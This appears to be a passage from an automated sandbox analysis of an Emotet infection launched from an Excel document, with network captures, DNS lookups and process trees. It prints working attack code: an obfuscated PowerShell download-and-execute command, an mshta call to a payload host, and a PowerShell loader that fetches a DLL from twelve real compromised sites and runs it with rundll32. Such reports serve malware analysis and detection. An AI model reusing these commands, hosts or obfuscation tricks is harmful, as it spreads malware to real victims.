                                                                                                                  Jan 28, 2022 21:02:02.349278927 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349282026 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349314928 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349343061 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349351883 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349390030 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349421024 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349431992 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.621922970 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:07.171586990 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:07.171777010 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:43.744826078 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:43.745651960 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:03:18.804837942 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:03:18.866116047 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:22.814089060 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.116945028 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.117048025 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.207600117 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.510454893 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.527287006 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.527343988 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.527631998 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.545066118 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.850617886 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.850884914 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:35.192365885 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:35.537266970 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:36.355695009 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:36.358089924 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:39.355885029 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:39.355911970 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:39.355977058 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:39.356019020 CET4917280192.168.2.22160.16.102.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:01:38.788352966 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:01:38.832066059 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 21:01:59.982759953 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:02:00.001409054 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:01:38.788352966 CET | 192.168.2.22 | 8.8.8.8 | 0x77a6 | Standard query (0) | hostfeeling.com | A (IP address) | IN (0x0001)
Jan 28, 2022 21:01:59.982759953 CET | 192.168.2.22 | 8.8.8.8 | 0xf0b3 | Standard query (0) | jurnalpjf.lan.go.id | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:01:38.832066059 CET | 8.8.8.8 | 192.168.2.22 | 0x77a6 | No error (0) | hostfeeling.com |  | 164.90.147.135 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:02:00.001409054 CET | 8.8.8.8 | 192.168.2.22 | 0xf0b3 | No error (0) | jurnalpjf.lan.go.id |  | 103.206.244.105 | A (IP address) | IN (0x0001)

                                                                                                                  • 91.240.118.172
                                                                                                                  • jurnalpjf.lan.go.id

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:01:33.881614923 CET | 0 | OUT | GET /gg/ff/fe.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.240.118.172
Connection: Keep-Alive
Jan 28, 2022 21:01:33.943207026 CET | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Fri, 28 Jan 2022 20:01:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                  Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_
                                                                                                                  Jan 28, 2022 21:01:33.943257093 CET3INData Raw: 33 7d 1c 7d 5a 7d 24 7d 2c 7d 6f 7f 42 7d 41 7d 64 7f 32 7d 7e 7c 01 7d 63 7d 3a 7d 2e 7d 1a 7d 30 7f 31 7d 32 7d 7b 7d 1d 7d 7e 7d 70 7f 71 7d 31 7d 5b 7d 35 7f 37 7d 71 7d 7e 7f 36 7d 40 7f 37 7f 35 7d 3e 7f 36 7f 63 7d 3a 7f 34 7f 69 7d 48 7d
                                                                                                                  Data Ascii: 3}}Z}$},}oB}A}d2}~|}c}:}.}}01}2}{}}~}pq}1}[}57}q}~6}@75}>6c}:4i}H}AE}}|}:}o}@}l|7Bif}X}1d}Hcument}E}T4o|||6|8M}S1}U}T5}|(|(|1| 6}9|@|7|92Ea}>4|V|*|}Uo}T|O5|6|!|REwr}>1t|G|/}2||2}d|}:
                                                                                                                  Jan 28, 2022 21:01:33.943295956 CET4INData Raw: 2d 78 7b 7e 48 78 7e 78 30 7f 36 78 32 7f 3e 7f 54 7f 68 78 47 7f 73 77 5c 6e 7f 72 79 5a 7f 20 78 2a 78 1f 7f 20 7f 6f 7f 66 7f 20 7f 74 7f 68 7f 69 7f 73 7f 20 7b 57 7a 73 7f 20 77 25 77 5c 27 77 09 78 09 7f 63 78 09 78 5c 27 7f 62 7f 79 7f 20
                                                                                                                  Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y|xw~
                                                                                                                  Jan 28, 2022 21:01:33.943336964 CET6INData Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72
                                                                                                                  Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
                                                                                                                  Jan 28, 2022 21:01:33.943380117 CET7INData Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72
                                                                                                                  Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
                                                                                                                  Jan 28, 2022 21:01:33.943420887 CET9INData Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25
                                                                                                                  Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
                                                                                                                  Jan 28, 2022 21:01:33.943463087 CET10INData Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f
                                                                                                                  Data Ascii: 4Sixs*pCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$o*l4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr*25+{?n]lxG{kks,ks>kd*ospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc|8Lw%vztw\'wz
                                                                                                                  Jan 28, 2022 21:01:33.943505049 CET11INData Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61
                                                                                                                  Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
                                                                                                                  Jan 28, 2022 21:01:33.943540096 CET12INData Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35
                                                                                                                  Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
                                                                                                                  Jan 28, 2022 21:01:33.943568945 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
1           192.168.2.22  49168        91.240.118.172  80                C:\Windows\System32\mshta.exe
Timestamp  kBytes transferred  Direction  Data
Jan 28, 2022 21:01:38.683579922 CET  12  OUT  GET /gg/ff/fe.png HTTP/1.1
    Host: 91.240.118.172
    Connection: Keep-Alive
Jan 28, 2022 21:01:38.745675087 CET  14  IN  HTTP/1.1 200 OK
    Server: nginx/1.20.2
    Date: Fri, 28 Jan 2022 20:01:38 GMT
    Content-Type: image/png
    Content-Length: 1199
    Connection: keep-alive
    Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
    ETag: "4af-5d6a59dbe5e00"
    Accept-Ranges: bytes
Data Ascii:
$path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');
$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';
$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';
$url3 = 'http://it-o.biz/bitrix/xoDdDe/';
$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';
$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';
$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';
$url7 = 'https://property-eg.com/mlzkir/97v/';
$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';
$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';
$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';
$url11 = 'http://activetraining.sytes.net/libraries/8s/';
$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';

$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");
foreach ($url in $urls) {
   try {
       $web.DownloadFile($url, $path);
       if ((Get-Item $path).Length -ge 30000) {
           [Diagnostics.Process];
           break;
       }
   }
Jan 28, 2022 21:01:38.745712042 CET  14  IN
Data Ascii:
   catch{}
}
Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;


Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
2           192.168.2.22  49170        103.206.244.105  80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  kBytes transferred  Direction  Data
Jan 28, 2022 21:02:00.181602955 CET  15  OUT  GET /assets/iM/ HTTP/1.1
    Host: jurnalpjf.lan.go.id
    Connection: Keep-Alive
Jan 28, 2022 21:02:00.370345116 CET  17  IN  HTTP/1.1 200 OK
    Date: Fri, 28 Jan 2022 20:02:00 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.4.27
    X-Powered-By: PHP/7.4.27
    Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Fri, 28 Jan 2022 20:02:00 GMT
    Expires: Fri, 28 Jan 2022 20:02:00 GMT
    Content-Disposition: attachment; filename="uHkwl.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 548864
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
Jan 28, 2022 21:02:00.370373011 CET  18  IN
Jan 28, 2022 21:02:00.370387077 CET  19  IN
Jan 28, 2022 21:02:00.370400906 CET  21  IN
Jan 28, 2022 21:02:00.370413065 CET  22  IN
Jan 28, 2022 21:02:00.370424986 CET  23  IN
Jan 28, 2022 21:02:00.370441914 CET  25  IN
Jan 28, 2022 21:02:00.370454073 CET  26  IN
Jan 28, 2022 21:02:00.370465040 CET  27  IN
Jan 28, 2022 21:02:00.370480061 CET  29  IN
Jan 28, 2022 21:02:00.549765110 CET  30  IN


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
3           192.168.2.22  49172        160.16.102.168  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp  kBytes transferred  Direction  Data
Jan 28, 2022 21:03:23.207600117 CET  585  OUT
Jan 28, 2022 21:03:23.527287006 CET  586  IN
Jan 28, 2022 21:03:23.527343988 CET  586  IN
Jan 28, 2022 21:03:23.545066118 CET  587  OUT
Jan 28, 2022 21:03:23.850617886 CET  587  IN
Jan 28, 2022 21:03:35.192365885 CET  653  OUT
Jan 28, 2022 21:03:36.355695009 CET  654  IN
Jan 28, 2022 21:03:39.355885029 CET  654  IN



                                                                                                                  Target ID:0
                                                                                                                  Start time:21:01:18
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                  Imagebase:0x13f3d0000
                                                                                                                  File size:28253536 bytes
                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:2
                                                                                                                  Start time:21:01:19
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                  Imagebase:0x4a610000
                                                                                                                  File size:345088 bytes
                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:4
                                                                                                                  Start time:21:01:20
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                  Imagebase:0x13f860000
                                                                                                                  File size:13824 bytes
                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:6
                                                                                                                  Start time:21:01:23
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                  Imagebase:0x13ffa0000
                                                                                                                  File size:473600 bytes
                                                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:high

                                                                                                                  Target ID:8
                                                                                                                  Start time:21:01:56
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                  Imagebase:0x4a870000
                                                                                                                  File size:345088 bytes
                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:9
                                                                                                                  Start time:21:01:56
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  Target ID:10
                                                                                                                  Start time:21:01:59
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  Target ID:11
                                                                                                                  Start time:21:02:16
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  Target ID:13
                                                                                                                  Start time:21:02:22
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
